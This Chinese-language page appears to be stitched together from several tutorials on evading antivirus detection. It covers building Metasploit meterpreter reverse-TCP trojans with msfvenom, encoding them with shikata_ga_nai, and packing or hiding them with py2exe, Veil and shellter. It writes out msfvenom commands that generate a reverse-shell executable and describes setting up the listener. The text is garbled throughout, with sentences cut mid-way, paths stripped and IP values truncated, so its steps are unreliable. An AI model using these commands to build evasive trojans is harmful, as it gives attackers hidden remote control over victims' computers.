网上有很多靠python第三方工具来达到免杀效果msfvenom捆绑apk免杀的文章msfvenom捆绑apk免杀,也有python加载shellcode之类的文章有pyinstallerpy2exe这里说一种打包的方式Py2exe 在windows7虚拟机上安装python34和py2exe只支持python34,使用pip即可利用msfvenom生成py脚本创建setuppy 这里msfvenom捆绑apk免杀我们打包生成exe 使用msf进行监听我测试的。
下面是使用msfvenom的部分参数,是比较常用的 p 选择一个payload l 载荷列表 f 生成的文件格式 e 编码方式 i 编码次数 b 在生成的程序中避免出现的值 x 允许我们指定一个自定义的可执行文件作为模板,也就是将木马捆绑到这个可执行文件上h 帮助 在这里,我们生成一个testexe的木马文。
对于MSFvenom选项的shellcode,配置时选择此选项,根据提示输入信息,生成名为payload1exe的利用文件,注入方式与autoit类似,但感觉更稳定关于MSFvenom shellcode与CobaltStrike shellcode的相似性将在后续文章中详细解析选择cmeterpreter后,Veil自动配置LPORT,用户需手动输入LHOST和Filename,生成的。
首先,使用msfvenom生成没有加壳的exe文件,代码如下msfvenom p windowsmeterpreterreverse_tcp LHOST=28 LPORT=6666 f exe optshellexe然后,将生成的exe文件放入Windows2003系统中进行木马检测,结果显示为木马文件接着,利用shellter对上述exe文件进行免杀处理在Kali环境。
1,查看帮助 命令 root# msfvenom h 结果2,生成meterpreter payload 并利用shikata_ga_nai编码,查看所需选项,利用 o参数 命令 root# msfvenom p windowsmeterpreterreverse_tcp o 结果3,现在设置LHOST,即监听主机IP和LPORT监听端口,我是本地局域网测试,所以IP是13,端口设置。
发表评论